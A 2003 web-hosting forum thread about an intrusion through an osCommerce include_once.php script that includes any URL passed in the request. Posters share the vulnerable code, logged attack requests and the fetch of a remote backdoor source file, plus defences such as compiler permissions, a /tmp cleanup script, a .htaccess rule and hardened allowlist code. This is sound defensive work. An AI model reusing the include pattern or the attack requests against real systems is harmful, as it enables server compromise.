The Community Forums


OsCommerce v2.1 a major security issue?

Discussion in 'Security' started by ozzi4648, Mar 10, 2003.

  1. ozzi4648


    Does anyone know what version of OsCommerce is currently being installed on Cpanel? This is really scary:

    I have figured out the point of intrusion; here's how it took place:

    It was done via a web exploitable php script named (include_once.php) which was inside one of my customers' shopping cart folder.
    -----cat include_once.php------
    <?
    if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
    }
    ?>
    ------------

    The intruder would call this file's url and pass his own url within it as given below;

    -----contents from apache access_log-----
    200.xx.xx.xx [10/Mar/2003:10:34:07 -0600] "GET include_once.php?include_file=http://www.myxpls.hpg.com.br/a.php HTTP/1.1"
    ----------

    There was a series of such URLs passed in this way, and a file bdoor.c would be copied onto my /tmp folder:
    -----contents from error_log----------
    --09:57:25-- http://200.x.x.x:8080/bdoor.c
    => `bdoor.c'
    Connecting to 200.x.x.x:8080... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1,403 [text/plain]
    ----------

    Then /usr/bin/gcc would be used to compile bdoor.c into a file named bdoor,
    which would be executed as "./bdoor".

    In my case, as Shashi said, I had set chmod 000 on all the C compilers in /usr/bin,
    hence the intruder got:
    sh: /usr/bin/gcc: Permission denied
    sh: ./bdoor: No such file or directory

    Shashi saved me; otherwise the intruder would have cracked the box once again.

    Now I have deleted the include_once.php file.

    Shashi, ajteu and all of you, please let me know what else I can do.
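The root cause in the post above is that the value of `include_file` is taken straight from the request (via register_globals in PHP of that era) and handed to `include()`, so any URL the caller supplies is fetched and executed. The block below is an added example, not code from the thread, from osCommerce or from cPanel. It shows a hardened replacement for that pattern, in which the request value is only ever a key into a fixed allowlist of local files, and a small scan of Apache access_log lines for the request shape quoted above. The include names, the application root, the parameter name and the log lines are all constructed for the example.

```php
<?php
// Added example, not code from the thread or from osCommerce/cPanel.
// Part 1: the quoted include_once.php pattern, hardened so that the request
//         can only pick from a fixed list of local files.
// Part 2: a scan of Apache access_log lines for the remote-include request
//         shape quoted in the thread.
// All file names, parameter names and log lines below are constructed.

// The original script did, in effect:
//     include($include_file);
// where $include_file came straight from the request, so any URL or path
// the caller chose was loaded and executed.

// Hardened form: the request value is only a key into this map; the map
// values are fixed relative paths under the application root (assumed names).
const INCLUDE_MAP = [
    'header'  => 'includes/header.php',
    'footer'  => 'includes/footer.php',
    'catalog' => 'includes/catalog.php',
];

/**
 * Turn a caller-supplied name into a local file path, or null if the name is
 * not on the allowlist. Because the request value never becomes part of the
 * path itself, a value such as "http://host/a.php" cannot reach include().
 */
function resolveInclude(string $name, string $appRoot): ?string
{
    if (!array_key_exists($name, INCLUDE_MAP)) {
        return null;
    }
    return rtrim($appRoot, '/') . '/' . INCLUDE_MAP[$name];
}

/**
 * Return the access_log lines whose query string carries a URL (scheme://)
 * in the given parameter: the shape of the requests quoted in the thread.
 * parse_str() percent-decodes values, so "http%3A%2F%2F" is caught as well.
 */
function findRemoteIncludeAttempts(array $logLines, string $param = 'include_file'): array
{
    $hits = [];
    foreach ($logLines as $line) {
        // The request target is the second token of the quoted "METHOD target PROTO" field.
        if (!preg_match('/"(?:GET|POST|HEAD)\s+(\S+)/', $line, $m)) {
            continue;
        }
        $query = parse_url($m[1], PHP_URL_QUERY);
        if (!is_string($query)) {
            continue;
        }
        parse_str($query, $params);
        $value = $params[$param] ?? '';
        if (is_string($value) && preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// Constructed sample log lines (TEST-NET addresses and .example hosts).
$sampleLog = [
    '203.0.113.7 - - [10/Mar/2003:10:34:07 -0600] "GET /shop/include_once.php?include_file=http://remote.example/a.php HTTP/1.1" 200 512',
    '198.51.100.2 - - [10/Mar/2003:10:35:11 -0600] "GET /shop/include_once.php?include_file=header HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Mar/2003:10:36:40 -0600] "GET /shop/include_once.php?include_file=ftp%3A%2F%2Fremote.example%2Fb.php HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Mar/2003:10:37:02 -0600] "GET /shop/index.php?page=contact HTTP/1.1" 200 4096',
];

$appRoot = '/home/shop/public_html';   // assumed application root

// Resolver: an allowlisted name yields a local path; a URL or an unknown
// name yields null, and the caller should answer with an error instead.
foreach (['header', 'http://remote.example/a.php', 'admin'] as $requested) {
    $path = resolveInclude($requested, $appRoot);
    echo $requested, ' => ', $path === null ? 'rejected' : $path, "\n";
}

// Scanner: the first and third lines carry a URL in include_file and are
// reported; the two ordinary requests are not.
foreach (findRemoteIncludeAttempts($sampleLog) as $hit) {
    echo "remote include attempt: $hit\n";
}
```

In the page that needs the include, the call becomes `$target = resolveInclude($_GET['include_file'] ?? '', __DIR__);` followed by a check for null before `include_once $target;`, reading the request value explicitly rather than relying on register_globals. Disabling `allow_url_fopen` in php.ini (and, on later PHP releases, `allow_url_include`) removes the remote half of the problem server-wide, but the allowlist is what stops the script from including arbitrary local files as well.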
     
  2. Juanra

  3. ozzi4648


    Nope, I'm waiting for somebody who knows what version of Oscommerce is currently being deployed. While my users can deploy it, I have no idea what version it is. Does anyone know? Now we have two: phpbb 2.0.2 and Oscommerce. Again, when are they going to give us updates, after we get hacked some more?

    From what I have read, if you chmod the compiler files to 000 in /usr/bin/*cc*, then they cannot compile the backdoor program deployed to /tmp, so it's useless. Another nifty script is one that runs checking /tmp for any files uploaded there, so if a .c file is found it gets deleted.

    This is from WHT:

    Create a script;

    #!/bin/sh
    while true
    do
    sleep 30s
    cd /tmp || exit 1
    rm -f *.c
    done
    -----------

    and run that script in the background as
    ./script > /dev/null 2>&1 &

    What that script does is check your /tmp partition every 30 seconds and delete any *.c files that it finds, while sending all output and error messages to /dev/null. Do this if you don't want to chmod your compiler files. It's a temporary solution.
     
    #3 ozzi4648, Mar 10, 2003
  4. Juanra

    Thanks for that. I guess gcc can be non-executable most of the time. As for OsCommerce, it seems to be Preview Release 2.2, but I don't know if it's been patched by the Cpanel developers. You may unpack the pkg.tar.gz file yourself and peek inside to check if it's all right.
     
  5. jmc67

    I downloaded the cpanel package for oscommerce. Looks like it's version 2.2:

    osCommerce Release 2.2-CVS ($date$)

    The package is located at /usr/local/cpanel/addons/osCommerce
    I checked to see if that file exists and it does not. I even installed it and still no include_once.php file.
     
  6. ozzi4648


    Well my pkg.tar.gz file is dated

    -rw-r--r-- 1 root root 963502 Dec 1 18:31 pkg.tar.gz

    Seems rather old, 3 months old. What's the date on the pkg file?
     
  7. jmc67

    -rw-r--r-- 1 root root 963502 Dec 1 21:31 pkg.tar.gz
     
  8. ZachICU

    No word from cpanel team yet on this major security flaw?
     
  9. jumpdomain

    To stop this particular exploit, you can create a .htaccess file in your /home directory and put in:

    <Files include_once.php>
    order allow,deny
    deny from all
    </Files>

    There is no reason this included file should even be able to be called from the web in the first place.

    But in the end, this package should be updated...
     
  10. iago

    Hi there, I also posted this thread
    http://forums.cpanel.net/showthread.php?s=&threadid=7771
    regarding the C compiler option.

    But it seems there are too many posts for the support staff to take care of. :mad: Hope they hire more people to give better support to their clients. I always receive a quicker and more helpful reply at WHT.

    I think these kinds of threads can bring up some good ideas on how to secure the server and protect us from buggy scripts that are not updated by Cpanel in the first place.

    Still waiting to find out how I can upgrade the third-party software packages myself, like phpbb and oscommerce. Any suggestions?

    Regards and hope to hear some input from the support staff or admins. :(
     
  11. Radio_Head

    Is there any news about the oscommerce exploit explained in this post?
     
  12. sparek-3

    Sorry if this doesn't pertain to the security problem, but what version of CPanel has OSCommerce installed with it? The CPanel servers we have only have Interchange and Agorra shopping carts installed by default. Is there a way to get OSCommerce integrated into a user's CPanel?
     
  13. myusername

    Install osCommerce under "Addon Scripts" in WHM.
     
  14. jsteel

  15. myusername

    Hi, I have it downloaded as well, but I can't for the life of me see the version number.

    Where did you get "osCommerce Release 2.2-CVS ($date$)" from?

    Mine is dated 12-01 like the rest of you folks. Anyone know where to find the current version number of a particular installed cart or, for that matter, the exact file that states the current addon version being installed from cpanel?

    Anyone?
     
  16. sexy_guy